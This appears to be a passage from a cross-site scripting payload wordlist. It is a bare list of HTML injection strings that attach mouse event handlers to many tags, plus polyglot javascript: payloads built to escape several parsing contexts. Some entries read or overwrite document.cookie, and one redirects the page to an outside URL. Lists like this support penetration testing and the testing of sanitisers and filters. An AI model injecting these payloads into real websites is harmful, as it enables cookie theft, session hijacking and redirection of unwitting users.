<u onmousemove="alert(1)">test</u>
<u onmouseout="alert(1)">test</u>
<u onmouseover="alert(1)">test</u>
<u onmouseup="alert(1)">test</u>
<u onmousewheel=alert(1)>requires scrolling
<ul onmousedown="alert(1)">test</ul>
<ul onmouseenter="alert(1)">test</ul>
<ul onmouseleave="alert(1)">test</ul>
<ul onmousemove="alert(1)">test</ul>
<ul onmouseout="alert(1)">test</ul>
<ul onmouseover="alert(1)">test</ul>
<ul onmouseup="alert(1)">test</ul>
<ul onmousewheel=alert(1)>requires scrolling
<var onmousedown="alert(1)">test</var>
<var onmouseenter="alert(1)">test</var>
<var onmouseleave="alert(1)">test</var>
<var onmousemove="alert(1)">test</var>
<var onmouseout="alert(1)">test</var>
<var onmouseover="alert(1)">test</var>
<var onmouseover="prompt(1)">On Mouse Over</var>
<var onmouseover="prompt(1)">On Mouse Over</var>?
<var onmouseover="prompt(1)">xss</var>
<var onmouseup="alert(1)">test</var>
<var onmousewheel=alert(1)>requires scrolling
<video onmousedown="alert(1)">test</video>
<video onmouseenter="alert(1)">test</video>
<video onmouseleave="alert(1)">test</video>
<video onmousemove="alert(1)">test</video>
<video onmouseout="alert(1)">test</video>
<video onmouseover="alert(1)">test</video>
<video onmouseup="alert(1)">test</video>
<video onmousewheel=alert(1)>requires scrolling
<video2 onmousedown="alert(1)">test</video2>
<video2 onmouseenter="alert(1)">test</video2>
<video2 onmouseleave="alert(1)">test</video2>
<video2 onmousemove="alert(1)">test</video2>
<video2 onmouseout="alert(1)">test</video2>
<video2 onmouseover="alert(1)">test</video2>
<video2 onmouseup="alert(1)">test</video2>
<video2 onmousewheel=alert(1)>requires scrolling
<wbr onmousedown="alert(1)">test</wbr>
<wbr onmouseenter="alert(1)">test</wbr>
<wbr onmouseleave="alert(1)">test</wbr>
<wbr onmousemove="alert(1)">test</wbr>
<wbr onmouseout="alert(1)">test</wbr>
<wbr onmouseover="alert(1)">test</wbr>
<wbr onmouseup="alert(1)">test</wbr>
<wbr onmousewheel=alert(1)>requires scrolling
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<xmp onmousedown="alert(1)">test</xmp>
<xmp onmouseenter="alert(1)">test</xmp>
<xmp onmouseleave="alert(1)">test</xmp>
<xmp onmousemove="alert(1)">test</xmp>
<xmp onmouseout="alert(1)">test</xmp>
<xmp onmouseover="alert(1)">test</xmp>
<xmp onmouseup="alert(1)">test</xmp>
<xmp onmousewheel=alert(1)>requires scrolling
>"<div onmouseover="document.cookie=true;">
>"<img src="blah"onmouseover="document.cookie=true;">
>"<img src="blah>" onmouseover="document.cookie=true;">
><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
[color=red' onmouseover="alert('xss')"]mouse over[/color]
\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>
data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var>
Inline Injection    onmouseover=alert(1)//
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
onmousedown
onmousemove
onmouseout
onmouseover
onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
onmouseup
t" onmouseover=alert(/xss/); a="
><img title="test-xss" onmouseup="confirm(document.domain)">
